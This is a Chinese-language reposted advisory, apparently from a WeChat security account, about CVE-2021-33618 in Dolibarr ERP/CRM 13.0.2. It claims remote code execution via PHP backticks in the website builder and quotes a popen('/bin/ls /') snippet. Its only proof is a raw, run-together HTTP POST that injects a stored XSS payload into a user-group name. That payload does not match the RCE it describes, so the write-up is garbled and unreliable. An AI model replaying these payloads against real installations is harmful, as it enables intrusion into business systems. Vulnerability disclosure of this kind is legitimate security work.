受影响的产品:Dolibarr ERP 和 CRM
测试版本:Dolibarr 13.0.2
默认设置下的 Dolibarr 应用程序允许远程代码执行 在网站构建器模块中。当尝试使用像“exec()”这样的语句时, “system()”或“shell_exec()”应用程序正确地阻止了它们。但是我们能够使用““”(反引号)来执行代码,这与 “shell_exec()” 或 “echo fread(popen(‘/bin/ls /’, ‘r’), 4096);”。
POST /user/group/card.php HTTP/1.1Host: 10.11.9.80User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 -securitytest-for-dolibarrAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------329097076628264922392755475836Content-Length: 950Origin: http://10.11.9.80Connection: closeReferer: http://10.11.9.80/user/group/card.php?id=1&action=edit&token=4726524fe505b027519a535e08c11fb6Cookie: PHPSESSID=8s2jl8fhmbm5th8r4baasak1q2; DOLSESSID_736206a821984837877b8a6a901910d2=4jkf7smp24evfm3vvnnunj8jaqUpgrade-Insecure-Requests: 1- -----------------------------329097076628264922392755475836Content-Disposition: form-data; name="token"6585d0838337cafddc3387fcccbe9d91- -----------------------------329097076628264922392755475836Content-Disposition: form-data; name="action"update- -----------------------------329097076628264922392755475836Content-Disposition: form-data; name="backtopage"/user/group/card.php?id=1- -----------------------------329097076628264922392755475836Content-Disposition: form-data; name="id"1- -----------------------------329097076628264922392755475836Content-Disposition: form-data; name="nom"Trovent<<body onpointermove=alert(1) <>test- -----------------------------329097076628264922392755475836Content-Disposition: form-data; name="note"- -----------------------------329097076628264922392755475836Content-Disposition: form-data; name="save"Save- -----------------------------329097076628264922392755475836--
修复方案:
始终对用户输入进行转义, 无论其反映在何处。将所有 HTML 标签和属性列入黑名单。
在 Dolibarr 版本 14.0.0 中修复,由 Trovent 验证。
原文始发于微信公众号(Khan安全攻防实验室):CVE-2021-33618 Dolibarr ERP/CRM 13.0.2 远程代码执行
